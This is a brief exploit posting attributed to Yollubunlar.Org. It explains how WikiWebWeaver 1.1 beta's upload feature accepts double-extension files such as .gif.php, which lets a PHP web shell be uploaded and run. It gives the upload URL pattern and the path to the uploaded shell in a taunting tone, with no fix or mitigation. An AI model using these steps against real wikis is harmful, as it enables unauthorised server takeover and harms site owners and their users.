|
Yollubunlar.Org
--------------------------------------------------------------------------------
Title : WikiWebWeaver 1.1 beta Upload Shell Upload Vulnerability
--------------------------------------------------------------------------------
#Author: Yollubunlar.Org
#cont@ct: yollubunlar@hotmail.com
--------------------------------------------------------------------------------
Affected software description :
--------------------------------------------------------------------------------
Application : WikiWebWeaver 1.1
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
Exploit:
WikiWebWeaver 1.0 beta 2 Script Have Upload part and you can upload only gif,jpeg lol :D
but you can upload gif.php or psd.php
http://www.site.com/wiki_path/index.php?upload
we upload a .gif.php or others than our shell go
http://www.site.com/wiki_path/data/documents/ourshell.gif.php :)
--------------------------------------------------------------------------------
greets:Yollubunlar.Org
--------------------------------------------------------------------------------
--------------------------------- [Yollubunlar.Org ] --------------------------------------